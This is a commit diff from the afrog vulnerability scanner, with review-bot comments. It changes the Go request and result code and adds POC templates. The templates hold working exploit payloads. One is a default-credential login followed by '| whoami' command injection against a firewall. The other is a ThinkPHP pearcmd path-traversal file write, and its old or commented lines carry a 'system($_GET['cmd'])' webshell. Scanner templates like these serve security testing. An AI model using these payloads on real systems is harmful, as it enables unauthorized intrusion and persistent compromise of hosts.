Projects STRLCPY afrog Commits 8bab99b0
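--- a/pkg/core/checker.go
+++ b/pkg/core/checker.go
@@ -135,6 +135,7 @@
 pocRstTemp.ResultRequest = c.VariableMap["request"].(*proto.Request)
 }
 if c.VariableMap["fulltarget"] != nil {
+pocRstTemp.FullTarget = c.VariableMap["fulltarget"].(string)
 c.Result.FullTarget = c.VariableMap["fulltarget"].(string)
 }
 c.Result.AllPocResult = append(c.Result.AllPocResult, &pocRstTemp)
@@ -229,7 +230,7 @@
 c.Result.PocInfo = gpa.Poc
 if len(r.AllPocResult) > 0 {
 for _, v := range r.AllPocResult {
-c.Result.AllPocResult = append(c.Result.AllPocResult, &PocResult{ResultRequest: v.ResultRequest, ResultResponse: v.ResultResponse, IsVul: v.IsVul})
+c.Result.AllPocResult = append(c.Result.AllPocResult, &PocResult{ResultRequest: v.ResultRequest, ResultResponse: v.ResultResponse, IsVul: v.IsVul, FullTarget: target})
 }
 }
 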
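Review bot: The line added in the first hunk, `pocRstTemp.FullTarget = c.VariableMap["fulltarget"].(string)`, repeats the single-value type assertion of the line below it, so any non-string value stored under `fulltarget` panics the checker instead of yielding an error. The only writer visible in this commit (`variableMap["fulltarget"] = target` in client.go) stores a string, so this is defensive rather than a live bug, but a two-value assertion keeps the scan loop alive if another protocol ever stores something else: `if ft, ok := c.VariableMap["fulltarget"].(string); ok { pocRstTemp.FullTarget = ft; c.Result.FullTarget = ft }`. The enclosing function begins before the hunk.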
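--- a/pkg/core/result.go
+++ b/pkg/core/result.go
@@ -22,6 +22,7 @@
 }
 
 type PocResult struct {
+FullTarget string
 ResultRequest *proto.Request
 ResultResponse *proto.Response
 IsVul bool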
  • pkg/html/html.go
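--- a/pkg/protocols/http/retryhttpclient/client.go
+++ b/pkg/protocols/http/retryhttpclient/client.go
@@ -9,6 +9,7 @@
 "net"
 "net/http"
 "net/http/cookiejar"
+"net/http/httptrace"
 "net/url"
 "regexp"
 "runtime"
@@ -161,13 +162,20 @@
 
 // target
 target = fmt.Sprintf("%s://%s", u.Scheme, u.Host)
-targetfull := fulltarget(fmt.Sprintf("%s://%s", u.Scheme, u.Host), u.Path)
-if targetfull != target {
-target = targetfull
+if !strings.HasPrefix(rule.Request.Path, "^") {
+targetfull := fulltarget(fmt.Sprintf("%s://%s", u.Scheme, u.Host), u.Path)
+if targetfull != target {
+target = targetfull
+}
 }
 
 // path
 rule.Request.Path = setVariableMap(strings.TrimSpace(rule.Request.Path), variableMap)
+if !strings.HasPrefix(rule.Request.Path, "^") {
+target = strings.TrimRight(target, "/") + rule.Request.Path
+} else {
+target = strings.TrimRight(target, "/") + "/" + rule.Request.Path[1:]
+}
 // rule.Request.Path = strings.ReplaceAll(rule.Request.Path, " ", "%20")
 // rule.Request.Path = strings.ReplaceAll(rule.Request.Path, "+", "%20")
 
@@ -183,9 +191,9 @@
 }
 
 // newhttprequest
-req, err := retryablehttp.NewRequest(rule.Request.Method, strings.TrimRight(target, "/")+rule.Request.Path, nil)
+req, err := retryablehttp.NewRequest(rule.Request.Method, target, nil)
 if len(rule.Request.Body) > 0 {
-req, err = retryablehttp.NewRequest(rule.Request.Method, strings.TrimRight(target, "/")+rule.Request.Path, strings.NewReader(rule.Request.Body))
+req, err = retryablehttp.NewRequest(rule.Request.Method, target, strings.NewReader(rule.Request.Body))
 }
 if err != nil {
 return err
@@ -207,6 +215,15 @@
 req.Header.Add("User-Agent", utils.RandomUA())
 }
 
+// latency
+var milliseconds int64
+start := time.Now()
+trace := httptrace.ClientTrace{}
+trace.GotFirstResponseByte = func() {
+milliseconds = time.Since(start).Nanoseconds() / 1e6
+}
+req = req.WithContext(httptrace.WithClientTrace(req.Context(), &trace))
+
 // http client do request
 resp := &http.Response{}
 if !rule.Request.FollowRedirects {
@@ -252,6 +269,7 @@
 protoResp.Body = []byte(utf8RespBody)
 protoResp.Raw = []byte(resp.Proto + " " + resp.Status + "\n" + strings.Trim(rawHeaderBuilder.String(), "\n") + "\n\n" + utf8RespBody)
 protoResp.RawHeader = []byte(strings.Trim(rawHeaderBuilder.String(), "\n"))
+protoResp.Latency = milliseconds
 variableMap["response"] = protoResp
 
 // store the request
@@ -274,13 +292,13 @@
 protoReq.ContentType = req.Header.Get("Content-Type")
 protoReq.Body = []byte(rule.Request.Body)
 
-reqPath := strings.Replace(utils.UrlTypeToString(protoResp.Url), strings.TrimRight(target, "/"), "", 1)
+reqPath := strings.Replace(target, fmt.Sprintf("%s://%s", u.Scheme, u.Host), "", 1)
 protoReq.Raw = []byte(req.Method + " " + reqPath + " " + req.Proto + "\n" + "Host: " + req.URL.Host + "\n" + strings.Trim(rawReqHeaderBuilder.String(), "\n") + "\n\n" + string(rule.Request.Body))
 protoReq.RawHeader = []byte(strings.Trim(rawReqHeaderBuilder.String(), "\n"))
 variableMap["request"] = protoReq
 
 // store the full target url
-variableMap["fulltarget"] = utils.UrlTypeToString(protoResp.Url)
+variableMap["fulltarget"] = target
 
 return nil
 }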
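Review bot: The value recorded in the `// latency` hunk is cumulative, not per-response: `start` is taken once before the request is issued, and because the trace rides on the request context, `GotFirstResponseByte` fires again for every redirect hop (and presumably for each retry the retryable client performs), so `milliseconds` ends up as the time from the very first send to the first byte of the last hop. If that whole-exchange time-to-first-byte is what `Latency` is meant to report, a comment on the field or on this block should say so, e.g. `// time to first byte of the final response, measured from the first send (includes redirect hops and retries)`; if per-hop timing was intended, `start` needs resetting per attempt. Separately, `time.Since(start).Nanoseconds() / 1e6` is spelled `time.Since(start).Milliseconds()` in the standard library. The enclosing function starts before the first hunk of this section.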
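--- a/pocs/temp/afrog-pocs/test/youyou-firewall-rce.yaml
+++ b/pocs/temp/afrog-pocs/test/youyou-firewall-rce.yaml
@@ -0,0 +1,46 @@
+id: youyou-firewall-rce
+
+info:
+name: 佑友防火墙 后台命令执行漏洞
+author: daffainfo
+severity: critical
+description: |
+佑友防火墙+路由,保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题;防火墙模块具备了防黑功能,防止ARP等病毒骚扰;佑友防火墙网关同时还配备了上网行为管理模块,可以合理有效控制员工上网行为,大大降低了员工上网中病毒的概率,同时高效使用公司带宽,不会造成网络阻塞等状况。佑友防火墙系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
+fofa-query: title="佑友防火墙"
+reference:
+- https://mp.weixin.qq.com/s/DE34Gu6Dw9hBbkdJqizSYQ
+
+set:
+hosturl: request.url
+rules:
+r0:
+request:
+method: POST
+path: /index.php?c=user&a=ajax_save
+body: username=admin&password=hicomadmin&language=zh-cn
+expression: |
+response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie') && response.raw_header.bcontains(b'FWSESSID=')
+output:
+search: '"Set-Cookie: FWSESSID=(?P<phpsession>.*?)\n".bsubmatch(response.raw_header)'
+phpsession: search["phpsession"]
+r1:
+request:
+method: POST
+path: /index.php?c=maintain&a=ping
+headers:
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Cookie: "PHPSESSID={{phpsession}}"
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Origin: "{{hosturl}}"
+Referer: "{{hosturl}}/index.php?c=maintain&a=ping"
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: frame
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+body: interface=&destip=+127.0.0.1+%7C+whoami
+expression: |
+response.status == 200 && response.body.bcontains(b'系统管理') && response.body.bcontains(b'维护工具') && response.body.bcontains(b'Ping')
+expression: r0() && r1()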
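Review bot: The session cookie captured in r0 is replayed under a different name in r1: the `search` regex takes the value of `FWSESSID=` from `Set-Cookie`, but r1 sends `Cookie: "PHPSESSID={{phpsession}}"`, so unless the appliance accepts its session id under both names the second request runs unauthenticated and the POC can never match. The capture `(?P<phpsession>.*?)\n` also swallows any cookie attributes that follow the value (`; path=/; HttpOnly`); `search: '"Set-Cookie: FWSESSID=(?P<phpsession>[^;\s]+)".bsubmatch(response.raw_header)'` together with `Cookie: "FWSESSID={{phpsession}}"` fixes both. Finally, r1's expression only checks that the maintenance page rendered (`系统管理`, `维护工具`, `Ping`), which any authenticated view of that page satisfies, so a hit proves the default credentials `admin/hicomadmin` worked rather than that `| whoami` ran; asserting on the command's output (or echoing a random token) would make the verdict reflect actual execution, and the description should note that the check executes a command on the target.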
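--- a/pocs/temp/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml
+++ b/pocs/temp/afrog-pocs/vulnerability/thinkphp-lang-rce.yaml
@@ -8,16 +8,38 @@
 thinkphp多语言模块存在Rce漏洞
 app="Thinkphp"
 set:
-fileName: randomLowercase(8) + ".php"
+n1: randomInt(800000000, 1000000000)
+payloads:
+payloads:
+parm1: |
+"?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?="
+parm2: |
+"?+config-create+/<?="
 rules:
+# r00:
+# request:
+# method: GET
+# path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{n1}}.php"
+# expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
 r0:
 request:
 method: GET
-path: "/public/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
-expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
+path: "/{{parm1}}md5({{n1}});?>+/var/www/html/{{n1}}.php"
+headers:
+think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
+Cookie: think_lang=../../../../../../../../usr/local/lib/php/pearcmd
+expression: response.status == 200
 r1:
 request:
 method: GET
-path: "/?+config-create+/&&lang=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_GET['cmd'])?>+/var/www/html/{{fileName}}"
-expression: response.status == 200 && response.body.bcontains(b'CONFIGURATION')
-expression: r0() || r1()
+path: "/{{parm2}}md5({{n1}});?>+/var/www/html/{{n1}}.php"
+headers:
+think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
+Cookie: think_lang=../../../../../../../../usr/local/lib/php/pearcmd
+expression: response.status == 200
+r2:
+request:
+method: GET
+path: ^{{n1}}.php
+expression: response.body.bcontains(bytes(md5(string(n1))))
+expression: (r0() || r1()) && r2()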
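Review bot: The rewritten r0/r1 drop a file `/var/www/html/{{n1}}.php` into the target's webroot via pearcmd `config-create`, and nothing in the POC removes it, so every positive scan leaves a persistent artifact on the host (its body is only `<?=md5(n1);?>`, no longer the `system($_GET['cmd'])` shell of the old version, but it is still an unauthorized file an operator has to clean up); this should be stated in `info`'s description, e.g. `# NOTE: writes <random>.php to /var/www/html on a vulnerable host; it is not removed`. r2's `path: ^{{n1}}.php` relies on the leading-`^` host-root convention introduced in client.go in this same commit, which deserves a one-line comment in the POC since a reader of the YAML alone cannot tell `^` from a literal character. One hedged point: `parm1`/`parm2` use `|` block scalars, which keep a trailing newline; if afrog does not trim payload values before substitution the newline would land in the request line, and `|-` avoids the question entirely.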